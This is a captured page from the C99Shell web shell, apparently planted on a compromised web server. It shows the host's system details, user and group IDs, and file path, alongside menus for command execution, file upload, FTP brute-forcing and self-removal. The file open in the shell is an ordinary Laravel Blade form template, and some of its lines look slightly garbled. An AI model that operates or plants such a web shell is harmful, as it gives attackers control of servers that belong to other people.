!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 28.4 GB of 117.98 GB (24.07%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     0c47eb6f6aada57218a0d3a1fbb366f6edfc1788.php (3.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="form-group">
    <label for="title"><?php echo app('translator')->get('customer.title'); ?></label>
    <input value="<?php echo e(isset($form) && isset($form->title)?$form->title:''); ?>" type="text" name="title" class="form-control" id="title"
           placeholder="<?php echo app('translator')->get('customer.title'); ?>">
</div>
<?php if(!isset($form_details)): ?>

<div class="form-group">
    <div class="row">
        <div class="col-lg-4">
            <label for="input_name"><?php echo app('translator')->get('customer.name'); ?></label>
            <input value="" type="text" name="input_name[]" class="form-control" id="input_name"
                   placeholder="<?php echo app('translator')->get('customer.name'); ?>">
        </div>
        <div class="col-lg-3">
            <label for="input_type"><?php echo app('translator')->get('customer.input_type'); ?></label>
            <select class="form-control" name="input_type[]" id="input_type">
                <option value="checkbox">Checkbox</option>
                <option value="input">Input</option>
                <option value="textarea">Textarea</option>
                <option value="radio">Radio</option>
            </select>
        </div>
        <div class="col-lg-4">
            <label for="input_label"><?php echo app('translator')->get('customer.label'); ?></label>
            <input value="" type="text" name="input_label[]" class="form-control" id="input_label"
                   placeholder="<?php echo app('translator')->get('customer.label'); ?>">
        </div>
    </div>
</div>
<?php endif; ?>


<?php if(isset($form_details)): ?>
<?php $__currentLoopData 
$form_details$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key =>$form_details): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
<div class="form-group">
    <div class="row" id="form-row_<?php echo e(isset($form_details) && isset($form_details->id)?$form_details->id:''); ?>">
        <div class="col-lg-4">
            <input value="<?php echo e(isset($form_details) && isset($form_details->input_name)?$form_details->input_name:''); ?>" type="text" name="input_name[]" class="form-control" id="input_name"
                   placeholder="<?php echo app('translator')->get('customer.name'); ?>">
        </div>
        <div class="col-lg-3">
            <select class="form-control" name="input_type[]" id="input_type">
                <option <?php echo e(isset($form_details) && $form_details->input_type=='checkbox'?'selected':''); ?> value="checkbox">Checkbox</option>
                <option <?php echo e(isset($form_details) && $form_details->input_type=='input'?'selected':''); ?> value="input">Input</option>
                <option <?php echo e(isset($form_details) && $form_details->input_type=='textarea'?'selected':''); ?> value="textarea">Textarea</option>
                <option <?php echo e(isset($form_details) && $form_details->input_type=='radio'?'selected':''); ?> value="radio">Radio</option>
            </select>
        </div>
        <div class="col-lg-4">
            <input value="<?php echo e(isset($form_details) && isset($form_details->input_label)?$form_details->input_label:''); ?>" type="text" name="input_label[]" class="form-control" id="input_label"
                   placeholder="<?php echo app('translator')->get('customer.label'); ?>">
        </div>
        <div class="col-lg-1">
            <button type="button" class="btn btn-danger float-right remove_button" id="remove_button_<?php echo e(isset($form_details) && isset($form_details->id)?$form_details->id:''); ?>" data-id="<?php echo e(isset($form_details) && isset($form_details->id)?$form_details->id:''); ?>"><i class="fas fa-minus-circle"></i></button>
        </div>
    </div>
</div>
<?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
<?php 
endif; ?>
<?php 
/**PATH /home/picotech/domains/picomail.picotech.app/public_html/resources/views/customer/form/form.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--